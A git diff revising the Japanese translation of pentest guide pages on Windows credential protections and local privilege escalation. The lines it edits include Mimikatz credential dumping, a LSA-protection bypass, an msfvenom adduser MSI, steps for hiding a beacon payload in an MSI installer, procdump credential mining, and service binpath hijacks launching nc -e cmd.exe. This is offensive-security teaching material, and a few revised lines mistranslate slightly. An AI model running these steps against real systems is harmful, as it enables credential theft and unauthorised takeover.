-[WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) プロトコルは、Windows XP と共に導入され、HTTP プロトコルを介した認証のために設計されており、**Windows XP から Windows 8.0 および Windows Server 2003 から Windows Server 2012 までデフォルトで有効**です。このデフォルト設定により、**LSASS にプレーンテキストのパスワードが保存されます**（ローカル セキュリティ認証局サブシステムサービス）。攻撃者は Mimikatz を使用して、次のコマンドを実行することで **これらの資格情報を抽出**できます:
+[WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) プロトコルは、Windows XP と共に導入され、HTTP プロトコルを介した認証のために設計されており、**Windows XP から Windows 8.0 および Windows Server 2003 から Windows Server 2012 までのデフォルトで有効**です。このデフォルト設定により、**LSASS にプレーンテキストパスワードが保存されます**（ローカルセキュリティ機関サブシステムサービス）。攻撃者は Mimikatz を使用して、次のコマンドを実行することで**これらの資格情報を抽出**できます：
 ```bash
 sekurlsa::wdigest
 ```
-この機能を**オフまたはオンに切り替える**には、_**UseLogonCredential**_ および _**Negotiate**_ レジストリキーを _**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_ 内で "1" に設定する必要があります。これらのキーが**存在しないか "0" に設定されている**場合、WDigestは**無効**になります。
+この機能を**オンまたはオフに切り替える**には、_**UseLogonCredential**_ および _**Negotiate**_ レジストリキーを _**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_ 内で "1" に設定する必要があります。これらのキーが**存在しないか "0" に設定されている**場合、WDigestは**無効**になります。
 ```bash
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
 ```
@@ -22,17 +22,17 @@ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
 ```
 ### バイパス
 
-この保護をバイパスすることは、Mimikatzドライバーmimidrv.sysを使用して可能です：
+この保護を bypass することは、Mimikatz ドライバー mimidrv.sys を使用して可能です：
 
 ![](../../images/mimidrv.png)
 
 ## Credential Guard
 
-**Credential Guard**は、**Windows 10 (EnterpriseおよびEducationエディション)**専用の機能で、**Virtual Secure Mode (VSM)**と**Virtualization Based Security (VBS)**を使用してマシンの資格情報のセキュリティを強化します。これは、CPUの仮想化拡張を利用して、主要なプロセスを保護されたメモリ空間内に隔離し、メインオペレーティングシステムのアクセスから遠ざけます。この隔離により、カーネルでさえVSM内のメモリにアクセスできず、**pass-the-hash**のような攻撃から資格情報を効果的に保護します。**Local Security Authority (LSA)**は、この安全な環境内でトラストレットとして動作し、メインOSの**LSASS**プロセスはVSMのLSAとの通信者としてのみ機能します。
+**Credential Guard** は、**Windows 10 (Enterprise および Education エディション)** 専用の機能で、**Virtual Secure Mode (VSM)** と **Virtualization Based Security (VBS)** を使用してマシンの資格情報のセキュリティを強化します。これは、CPU の仮想化拡張を利用して、主要なプロセスを保護されたメモリ空間内に隔離し、メインオペレーティングシステムのアクセスから遠ざけます。この隔離により、カーネルでさえ VSM 内のメモリにアクセスできず、**pass-the-hash** のような攻撃から資格情報を効果的に保護します。**Local Security Authority (LSA)** は、この安全な環境内でトラストレットとして動作し、メイン OS の **LSASS** プロセスは VSM の LSA と通信するだけの役割を果たします。
 
-デフォルトでは、**Credential Guard**はアクティブではなく、組織内で手動での有効化が必要です。これは、資格情報を抽出する能力が制限されるため、**Mimikatz**のようなツールに対するセキュリティを強化するために重要です。ただし、カスタム**Security Support Providers (SSP)**を追加することで、ログイン試行中に平文で資格情報をキャプチャするために脆弱性が悪用される可能性があります。
+デフォルトでは、**Credential Guard** はアクティブではなく、組織内で手動での有効化が必要です。これは、資格情報を抽出する能力が制限されるため、**Mimikatz** のようなツールに対するセキュリティを強化するために重要です。ただし、カスタム **Security Support Providers (SSP)** を追加することで、ログイン試行中に平文で資格情報をキャプチャするために脆弱性が悪用される可能性があります。
 
-**Credential Guard**の有効化状態を確認するには、_**HKLM\System\CurrentControlSet\Control\LSA**_の下にあるレジストリキー_**LsaCfgFlags**_を検査できます。値が"**1**"の場合は**UEFIロック**で有効化されており、"**2**"はロックなし、"**0**"は無効を示します。このレジストリチェックは強力な指標ですが、Credential Guardを有効にするための唯一のステップではありません。この機能を有効にするための詳細なガイダンスとPowerShellスクリプトはオンラインで入手可能です。
+**Credential Guard** のアクティベーション状態を確認するには、_**HKLM\System\CurrentControlSet\Control\LSA**_ の下にあるレジストリキー _**LsaCfgFlags**_ を調べることができます。値が "**1**" の場合は **UEFI ロック** 付きのアクティベーション、"**2**" はロックなし、"**0**" は無効を示します。このレジストリチェックは強力な指標ですが、Credential Guard を有効にするための唯一のステップではありません。この機能を有効にするための詳細なガイダンスと PowerShell スクリプトはオンラインで入手可能です。
 ```powershell
 reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 ```
@@ -42,11 +42,11 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 
 ## RDP RestrictedAdmin Mode
 
-**Windows 8.1とWindows Server 2012 R2**は、_**RDPのRestricted Adminモード**_を含むいくつかの新しいセキュリティ機能を導入しました。このモードは、[**パス・ザ・ハッシュ**](https://blog.ahasayen.com/pass-the-hash/)攻撃に関連するリスクを軽減することでセキュリティを強化することを目的としています。
+**Windows 8.1およびWindows Server 2012 R2**は、_**RDPのRestricted Adminモード**_を含むいくつかの新しいセキュリティ機能を導入しました。このモードは、[**パス・ザ・ハッシュ**](https://blog.ahasayen.com/pass-the-hash/)攻撃に関連するリスクを軽減することでセキュリティを強化することを目的としています。
 
 従来、RDPを介してリモートコンピュータに接続する際、資格情報はターゲットマシンに保存されます。これは、特に特権のあるアカウントを使用する場合に重大なセキュリティリスクをもたらします。しかし、_**Restricted Adminモード**_の導入により、このリスクは大幅に軽減されます。
 
-**mstsc.exe /RestrictedAdmin**コマンドを使用してRDP接続を開始すると、リモートコンピュータへの認証は、資格情報をその上に保存することなく行われます。このアプローチにより、マルウェア感染や悪意のあるユーザーがリモートサーバーにアクセスした場合でも、資格情報がサーバーに保存されていないため、危険にさらされることはありません。
+**mstsc.exe /RestrictedAdmin**コマンドを使用してRDP接続を開始すると、リモートコンピュータへの認証は、資格情報を保存することなく行われます。このアプローチにより、マルウェア感染や悪意のあるユーザーがリモートサーバーにアクセスした場合でも、資格情報がサーバーに保存されていないため、危険にさらされることはありません。
 
 **Restricted Adminモード**では、RDPセッションからネットワークリソースにアクセスしようとする試みは、個人の資格情報を使用せず、代わりに**マシンのアイデンティティ**が使用されることに注意が必要です。
 
@@ -58,7 +58,7 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 
 ## Cached Credentials
 
-Windowsは、**Local Security Authority (LSA)**を通じて**ドメイン資格情報**を保護し、**Kerberos**や**NTLM**などのセキュリティプロトコルを使用してログオンプロセスをサポートします。Windowsの重要な機能の一つは、**最後の10回のドメインログイン**をキャッシュする能力であり、これにより**ドメインコントローラーがオフライン**の場合でもユーザーがコンピュータにアクセスできるようになります。これは、会社のネットワークから離れていることが多いノートパソコンユーザーにとって大きな利点です。
+Windowsは、**Local Security Authority (LSA)**を通じて**ドメイン資格情報**を保護し、**Kerberos**や**NTLM**などのセキュリティプロトコルを使用してログオンプロセスをサポートします。Windowsの重要な機能の一つは、**最後の10回のドメインログイン**をキャッシュする能力であり、これにより**ドメインコントローラーがオフライン**であってもユーザーがコンピュータにアクセスできるようになります。これは、会社のネットワークから離れていることが多いノートパソコンユーザーにとって大きな利点です。
 
 キャッシュされたログインの数は、特定の**レジストリキーまたはグループポリシー**を介して調整可能です。この設定を表示または変更するには、次のコマンドが使用されます：
 ```bash
@@ -74,11 +74,11 @@ reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLO
 
 **Protected Users group** へのメンバーシップは、ユーザーに対していくつかのセキュリティ強化を導入し、資格情報の盗難や悪用に対するより高い保護レベルを確保します：
 
-- **Credential Delegation (CredSSP)**: **Allow delegating default credentials** のグループポリシー設定が有効であっても、Protected Users の平文資格情報はキャッシュされません。
-- **Windows Digest**: **Windows 8.1 および Windows Server 2012 R2** 以降、システムは Protected Users の平文資格情報をキャッシュしません。Windows Digest の状態に関係なく。
-- **NTLM**: システムは Protected Users の平文資格情報や NT 一方向関数 (NTOWF) をキャッシュしません。
-- **Kerberos**: Protected Users に対して、Kerberos 認証は **DES** または **RC4 keys** を生成せず、平文資格情報や初期 Ticket-Granting Ticket (TGT) 取得を超える長期キーをキャッシュしません。
-- **Offline Sign-In**: Protected Users はサインインまたはロック解除時にキャッシュされた検証子が作成されないため、これらのアカウントではオフラインサインインはサポートされていません。
+- **Credential Delegation (CredSSP)**: **Allow delegating default credentials** のグループポリシー設定が有効であっても、Protected Users のプレーンテキスト資格情報はキャッシュされません。
+- **Windows Digest**: **Windows 8.1 および Windows Server 2012 R2** 以降、システムは Protected Users のプレーンテキスト資格情報をキャッシュしません。Windows Digest の状態に関係なく。
+- **NTLM**: システムは Protected Users のプレーンテキスト資格情報や NT 一方向関数 (NTOWF) をキャッシュしません。
+- **Kerberos**: Protected Users に対して、Kerberos 認証は **DES** または **RC4 keys** を生成せず、プレーンテキスト資格情報や初期のチケット授与チケット (TGT) 取得を超える長期キーをキャッシュしません。
+- **Offline Sign-In**: Protected Users はサインインまたはロック解除時にキャッシュされた検証子が作成されないため、これらのアカウントではオフラインサインインはサポートされません。
 
 これらの保護は、**Protected Users group** のメンバーであるユーザーがデバイスにサインインした瞬間に有効になります。これにより、資格情報の侵害に対するさまざまな方法から保護するための重要なセキュリティ対策が講じられます。
 
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index 0aa21d58c..ca3cf3faf 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -21,18 +21,18 @@ WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken →
 .\WTSImpersonator.exe -m enum -s 192.168.40.131
 ```
 
-- **コマンドの実行**: `exec` および `exec-remote` モジュールは、機能するために **サービス** コンテキストを必要とします。ローカル実行には、WTSImpersonator 実行可能ファイルとコマンドが必要です。
+- **コマンドの実行**: `exec` および `exec-remote` モジュールは、機能するために **サービス** コンテキストを必要とします。ローカル実行には、WTSImpersonator実行可能ファイルとコマンドが必要です。
 
 - ローカルコマンド実行の例:
 ```powershell
 .\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
 ```
-- PsExec64.exe を使用してサービスコンテキストを取得できます:
+- PsExec64.exeを使用してサービスコンテキストを取得できます:
 ```powershell
 .\PsExec64.exe -accepteula -s cmd.exe
 ```
 
-- **リモートコマンド実行**: PsExec.exe に似たサービスをリモートで作成およびインストールし、適切な権限で実行を可能にします。
+- **リモートコマンド実行**: PsExec.exeに似たサービスをリモートで作成およびインストールし、適切な権限で実行を可能にします。
 
 - リモート実行の例:
 ```powershell
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index e20a1439c..165ed3b17 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -8,7 +8,7 @@
 
 ### アクセストークン
 
-**Windowsアクセストークンが何か知らない場合は、続行する前に以下のページを読んでください:**
+**Windowsアクセストークンが何か分からない場合は、続行する前に以下のページを読んでください:**
 
 {{#ref}}
 access-tokens.md
@@ -16,7 +16,7 @@ access-tokens.md
 
 ### ACLs - DACLs/SACLs/ACEs
 
-**ACLs - DACLs/SACLs/ACEsに関する詳細情報は以下のページを確認してください:**
+**ACLs - DACLs/SACLs/ACEsに関する詳細は以下のページを確認してください:**
 
 {{#ref}}
 acls-dacls-sacls-aces.md
@@ -24,7 +24,7 @@ acls-dacls-sacls-aces.md
 
 ### 整合性レベル
 
-**Windowsの整合性レベルが何か知らない場合は、続行する前に以下のページを読んでください:**
+**Windowsの整合性レベルが何か分からない場合は、続行する前に以下のページを読んでください:**
 
 {{#ref}}
 integrity-levels.md
@@ -42,7 +42,7 @@ Windowsには、**システムの列挙を妨げる**、実行可能ファイル
 
 ### バージョン情報の列挙
 
-Windowsのバージョンに既知の脆弱性があるか確認してください（適用されたパッチも確認してください）。
+Windowsのバージョンに既知の脆弱性がないか確認してください（適用されたパッチも確認してください）。
 ```bash
 systeminfo
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
@@ -97,7 +97,7 @@ cat (Get-PSReadlineOption).HistorySavePath | sls passw
 ```
 ### PowerShell トランスクリプトファイル
 
-この機能をオンにする方法は[https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/)で学ぶことができます。
+これをオンにする方法は[https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/)で学ぶことができます。
 ```bash
 #Check is enable in the registry
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
@@ -125,16 +125,16 @@ PowersShell ログから最後の 15 イベントを表示するには、次の
 ```bash
 Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
 ```
-### PowerShell **スクリプトブロックロギング**
+### PowerShell **スクリプトブロックログ記録**
 
-スクリプトの実行の完全なアクティビティと内容の記録がキャプチャされ、実行されるコードの各ブロックが文書化されることが保証されます。このプロセスは、各アクティビティの包括的な監査証跡を保持し、フォレンジックや悪意のある行動の分析に役立ちます。実行時にすべてのアクティビティを文書化することで、プロセスに関する詳細な洞察が提供されます。
+スクリプトの実行の完全な活動と全内容の記録がキャプチャされ、実行されるコードの各ブロックが文書化されることが保証されます。このプロセスは、各活動の包括的な監査証跡を保持し、フォレンジックや悪意のある行動の分析に役立ちます。実行時にすべての活動を文書化することにより、プロセスに関する詳細な洞察が提供されます。
 ```bash
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 ```
-スクリプトブロックのログイベントは、Windowsイベントビューアのパスにあります: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**。\
+スクリプトブロックのログイベントは、Windowsイベントビューワーのパスにあります: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**。\
 最後の20件のイベントを表示するには、次のコマンドを使用できます:
 ```bash
 Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
@@ -158,7 +158,7 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}|
 ```
 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
 ```
-返信が次のような場合：
+返信があった場合は：
 ```bash
 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
 WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
@@ -175,20 +175,20 @@ WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
 
 **WSUS CVE-2020-1013**
 
-[**完全なレポートをここで読む**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/)。\
+[**完全なレポートをこちらで読む**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/)。\
 基本的に、これはこのバグが悪用する欠陥です：
 
 > ローカルユーザープロキシを変更する権限があり、Windows Update が Internet Explorer の設定で構成されたプロキシを使用する場合、私たちは [PyWSUS](https://github.com/GoSecure/pywsus) をローカルで実行して自分のトラフィックを傍受し、資産上で昇格されたユーザーとしてコードを実行する権限を持っています。
 >
-> さらに、WSUS サービスは現在のユーザーの設定を使用するため、その証明書ストアも使用します。WSUS ホスト名の自己署名証明書を生成し、この証明書を現在のユーザーの証明書ストアに追加すれば、HTTP および HTTPS WSUS トラフィックの両方を傍受できるようになります。WSUS は、証明書に対して信頼の初回使用タイプの検証を実装するための HSTS のようなメカニズムを使用していません。提示された証明書がユーザーによって信頼され、正しいホスト名を持っている場合、サービスによって受け入れられます。
+> さらに、WSUS サービスは現在のユーザーの設定を使用するため、その証明書ストアも使用します。WSUS ホスト名の自己署名証明書を生成し、この証明書を現在のユーザーの証明書ストアに追加すれば、HTTP および HTTPS WSUS トラフィックの両方を傍受できるようになります。WSUS は、証明書に対して信頼性のある初回使用型の検証を実装するための HSTS のようなメカニズムを使用していません。提示された証明書がユーザーによって信頼され、正しいホスト名を持っている場合、サービスによって受け入れられます。
 
 この脆弱性を利用するには、ツール [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) を使用できます（解放された場合）。
 
 ## KrbRelayUp
 
-**ローカル特権昇格**の脆弱性は、特定の条件下で Windows **ドメイン** 環境に存在します。これらの条件には、**LDAP 署名が強制されていない**環境、ユーザーが **リソースベースの制約付き委任 (RBCD)** を構成する権利を持っていること、およびユーザーがドメイン内でコンピュータを作成する能力が含まれます。これらの**要件**は、**デフォルト設定**を使用して満たされることに注意が必要です。
+**ローカル特権昇格**の脆弱性は、特定の条件下で Windows **ドメイン** 環境に存在します。これらの条件には、**LDAP 署名が強制されていない**環境、ユーザーが **リソースベースの制約付き委任 (RBCD)** を構成する権利を持っている環境、およびユーザーがドメイン内でコンピュータを作成する能力が含まれます。これらの**要件**は、**デフォルト設定**を使用して満たされることに注意が必要です。
 
-**エクスプロイトを見つける** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
+**エクスプロイトを見つける**には [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
 
 攻撃の流れについての詳細は、[https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) を確認してください。
 
@@ -208,7 +208,7 @@ msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.ms
 
 ### PowerUP
 
-`Write-UserAddMSI`コマンドをpower-upから使用して、現在のディレクトリ内に特権昇格用のWindows MSIバイナリを作成します。このスクリプトは、ユーザー/グループの追加を促す事前コンパイルされたMSIインストーラーを出力します（そのため、GIUアクセスが必要です）：
+`Write-UserAddMSI`コマンドをpower-upから使用して、現在のディレクトリ内にWindows MSIバイナリを作成し、特権を昇格させます。このスクリプトは、ユーザー/グループの追加を促すプリコンパイルされたMSIインストーラーを書き出します（そのため、GIUアクセスが必要です）：
 ```
 Write-UserAddMSI
 ```
@@ -216,7 +216,7 @@ Write-UserAddMSI
 
 ### MSIラッパー
 
-このツールを使用してMSIラッパーを作成する方法を学ぶためにこのチュートリアルを読んでください。**コマンドラインを実行**したいだけの場合は、"**.bat**"ファイルをラップできます。
+このツールを使用してMSIラッパーを作成する方法を学ぶためにこのチュートリアルを読んでください。**コマンドラインを実行**したいだけの場合は、"**.bat**"ファイルをラップすることができます。
 
 {{#ref}}
 msi-wrapper.md
@@ -231,15 +231,15 @@ create-msi-with-wix.md
 ### Visual StudioでMSIを作成
 
 - **Cobalt Strike**または**Metasploit**を使用して、`C:\privesc\beacon.exe`に**新しいWindows EXE TCPペイロード**を生成します。
-- **Visual Studio**を開き、**新しいプロジェクトを作成**を選択し、検索ボックスに「installer」と入力します。**Setup Wizard**プロジェクトを選択し、**次へ**をクリックします。
-- プロジェクトに**AlwaysPrivesc**のような名前を付け、場所に**`C:\privesc`**を使用し、**ソリューションとプロジェクトを同じディレクトリに配置**を選択し、**作成**をクリックします。
-- **次へ**をクリックし続け、ステップ3の4（含めるファイルを選択）に到達します。**追加**をクリックし、先ほど生成したBeaconペイロードを選択します。次に、**完了**をクリックします。
-- **ソリューションエクスプローラー**で**AlwaysPrivesc**プロジェクトを強調表示し、**プロパティ**で**TargetPlatform**を**x86**から**x64**に変更します。
+- **Visual Studio**を開き、**新しいプロジェクトを作成**を選択し、検索ボックスに「installer」と入力します。**Setup Wizard**プロジェクトを選択し、**Next**をクリックします。
+- プロジェクトに**AlwaysPrivesc**のような名前を付け、場所に**`C:\privesc`**を使用し、**ソリューションとプロジェクトを同じディレクトリに配置**を選択し、**Create**をクリックします。
+- **Next**をクリックし続け、ステップ3の4（含めるファイルを選択）に到達します。**Add**をクリックし、先ほど生成したBeaconペイロードを選択します。次に、**Finish**をクリックします。
+- **Solution Explorer**で**AlwaysPrivesc**プロジェクトをハイライトし、**Properties**で**TargetPlatform**を**x86**から**x64**に変更します。
 - **Author**や**Manufacturer**など、インストールされたアプリをより正当なものに見せるために変更できる他のプロパティもあります。
-- プロジェクトを右クリックし、**表示 > カスタムアクション**を選択します。
-- **インストール**を右クリックし、**カスタムアクションの追加**を選択します。
-- **アプリケーションフォルダー**をダブルクリックし、**beacon.exe**ファイルを選択して**OK**をクリックします。これにより、インストーラーが実行されるとすぐにbeaconペイロードが実行されることが保証されます。
-- **カスタムアクションプロパティ**の下で、**Run64Bit**を**True**に変更します。
+- プロジェクトを右クリックし、**View > Custom Actions**を選択します。
+- **Install**を右クリックし、**Add Custom Action**を選択します。
+- **Application Folder**をダブルクリックし、**beacon.exe**ファイルを選択して**OK**をクリックします。これにより、インストーラーが実行されるとすぐにbeaconペイロードが実行されることが保証されます。
+- **Custom Action Properties**の下で、**Run64Bit**を**True**に変更します。
 - 最後に、**ビルド**します。
 - 警告`File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'`が表示された場合は、プラットフォームをx64に設定していることを確認してください。
 
@@ -267,7 +267,7 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs
 ```
 ### LAPS
 
-**LAPS**は、**ローカル管理者パスワードの管理**のために設計されており、ドメインに参加しているコンピュータ上で各パスワードが**一意で、ランダム化され、定期的に更新される**ことを保証します。これらのパスワードはActive Directory内に安全に保存され、ACLを通じて十分な権限を付与されたユーザーのみがアクセスでき、認可されている場合にローカル管理者パスワードを表示できます。
+**LAPS**は、**ローカル管理者パスワードの管理**のために設計されており、ドメインに参加しているコンピュータ上で各パスワードが**一意で、ランダム化され、定期的に更新される**ことを保証します。これらのパスワードはActive Directory内に安全に保存され、ACLを通じて十分な権限が付与されたユーザーのみがアクセスでき、認可されている場合にローカル管理者パスワードを表示できます。
 
 {{#ref}}
 ../active-directory-methodology/laps.md
@@ -275,15 +275,15 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs
 
 ### WDigest
 
-アクティブな場合、**平文のパスワードはLSASS**（ローカルセキュリティ認証サブシステムサービス）に保存されます。\
+アクティブな場合、**平文のパスワードはLSASS**（ローカルセキュリティ権限サブシステムサービス）に保存されます。\
 [**このページのWDigestに関する詳細情報**](../stealing-credentials/credentials-protections.md#wdigest)。
 ```bash
 reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
 ```
 ### LSA保護
 
-**Windows 8.1**から、Microsoftはローカルセキュリティ機関（LSA）の強化された保護を導入し、信頼されていないプロセスによる**メモリの読み取り**やコードの注入を**ブロック**することで、システムのセキュリティをさらに強化しました。\
-[**LSA保護に関する詳細はこちら**](../stealing-credentials/credentials-protections.md#lsa-protection)。
+**Windows 8.1**以降、Microsoftはローカルセキュリティ機関（LSA）の強化された保護を導入し、信頼されていないプロセスによる**メモリの読み取り**やコードの注入を**ブロック**することで、システムのセキュリティをさらに強化しました。\
+[**LSA保護の詳細はこちら**](../stealing-credentials/credentials-protections.md#lsa-protection)。
 ```bash
 reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
 ```
@@ -304,7 +304,7 @@ reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLO
 
 ### ユーザーとグループの列挙
 
-自分が所属するグループに興味深い権限があるかどうかを確認する必要があります。
+所属しているグループの中に興味深い権限を持つものがないか確認する必要があります。
 ```bash
 # CMD
 net users %username% #Me
@@ -354,11 +354,11 @@ net accounts
 ```bash
 powershell -command "Get-Clipboard"
 ```
-## 実行中のプロセス
+## プロセスの実行
 
 ### ファイルとフォルダーの権限
 
-まず、プロセスをリストする際に、**プロセスのコマンドライン内のパスワードを確認**します。\
+まず、プロセスをリストアップして、**プロセスのコマンドライン内にパスワードがないか確認します**。\
 **実行中のバイナリを上書きできるか**、またはバイナリフォルダーの書き込み権限があるかを確認して、可能な[**DLLハイジャック攻撃**](dll-hijacking/)を利用します：
 ```bash
 Tasklist /SVC #List processes running and services
@@ -391,7 +391,7 @@ todos %username%" && echo.
 ```
 ### メモリパスワードマイニング
 
-**procdump**を使用して、実行中のプロセスのメモリダンプを作成できます。FTPのようなサービスは**メモリ内に平文の資格情報を持っています**ので、メモリをダンプして資格情報を読み取ってみてください。
+**procdump**を使用して、実行中のプロセスのメモリダンプを作成できます。FTPのようなサービスは**メモリ内に平文の認証情報を持っています**ので、メモリをダンプして認証情報を読み取ってみてください。
 ```bash
 procdump.exe -accepteula -ma <proc_name_tasklist>
 ```
@@ -420,7 +420,7 @@ sc qc <service_name>
 ```bash
 accesschk.exe -ucqv <Service_Name> #Check rights for different groups
 ```
-"Authenticated Users"がサービスを変更できるかどうかを確認することをお勧めします:
+"Authenticated Users" がサービスを変更できるかどうかを確認することをお勧めします:
 ```bash
 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
 accesschk.exe -uwcqv %USERNAME% * /accepteula
@@ -431,7 +431,7 @@ accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
 
 ### サービスを有効にする
 
-このエラーが発生している場合（例えばSSDPSRVで）：
+このエラーが発生している場合（例えばSSDPSRVの場合）：
 
 _システムエラー1058が発生しました。_\
 &#xNAN;_&#x54;サービスは無効になっているか、関連付けられた有効なデバイスがないため、開始できません。_
@@ -447,7 +447,7 @@ sc.exe config usosvc start= auto
 ```
 ### **サービスバイナリパスの変更**
 
-「認証されたユーザー」グループがサービスに対して**SERVICE_ALL_ACCESS**を持つシナリオでは、サービスの実行可能バイナリを変更することが可能です。**sc**を変更して実行するには:
+「認証されたユーザー」グループがサービスに対して **SERVICE_ALL_ACCESS** を持つシナリオでは、サービスの実行可能バイナリを変更することが可能です。 **sc** を変更して実行するには:
 ```bash
 sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
 sc config <Service_Name> binpath= "net localgroup administrators username /add"
@@ -473,7 +473,7 @@ net stop [service name] && net start [service name]
 ### サービスバイナリの弱い権限
 
 **サービスによって実行されるバイナリを変更できるかどうか**、または**バイナリが存在するフォルダーに対して書き込み権限があるかどうかを確認してください**（[**DLL Hijacking**](dll-hijacking/)）。\
-**wmic**（system32ではない）を使用してサービスによって実行されるすべてのバイナリを取得し、**icacls**を使用して権限を確認できます：
+サービスによって実行されるすべてのバイナリを **wmic**（system32 ではない）を使用して取得し、**icacls** を使用して権限を確認できます：
 ```bash
 for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
 
@@ -488,7 +488,7 @@ FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >>
 ### サービスレジストリの変更権限
 
 サービスレジストリを変更できるか確認する必要があります。\
-サービス**レジストリ**に対する**権限**を**確認**するには、次のようにします:
+サービス **レジストリ** に対する **権限** を確認するには、次のようにします:
 ```bash
 reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
 
@@ -497,7 +497,7 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\
 
 get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
 ```
-**Authenticated Users** または **NT AUTHORITY\INTERACTIVE** が `FullControl` 権限を持っているかどうかを確認する必要があります。もしそうであれば、サービスによって実行されるバイナリを変更することができます。
+**Authenticated Users** または **NT AUTHORITY\INTERACTIVE** が `FullControl` 権限を持っているかどうかを確認する必要があります。そうであれば、サービスによって実行されるバイナリを変更できます。
 
 実行されるバイナリのパスを変更するには:
 ```bash
@@ -505,7 +505,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t RE
 ```
 ### サービスレジストリ AppendData/AddSubdirectory 権限
 
-この権限を持っている場合、**このレジストリからサブレジストリを作成できる**ことを意味します。Windows サービスの場合、これは**任意のコードを実行するのに十分です：**
+この権限を持っている場合、これは**このレジストリからサブレジストリを作成できることを意味します**。Windows サービスの場合、これは**任意のコードを実行するのに十分です：**
 
 {{#ref}}
 appenddata-addsubdirectory-permission-over-service-registry.md
@@ -513,7 +513,7 @@ appenddata-addsubdirectory-permission-over-service-registry.md
 
 ### 引用されていないサービスパス
 
-実行可能ファイルへのパスが引用符内にない場合、Windows はスペースの前にあるすべての部分を実行しようとします。
+実行可能ファイルへのパスが引用符内にない場合、Windows はスペースの前にあるすべての終了を実行しようとします。
 
 例えば、パス _C:\Program Files\Some Folder\Service.exe_ の場合、Windows は次のように実行しようとします：
 ```powershell
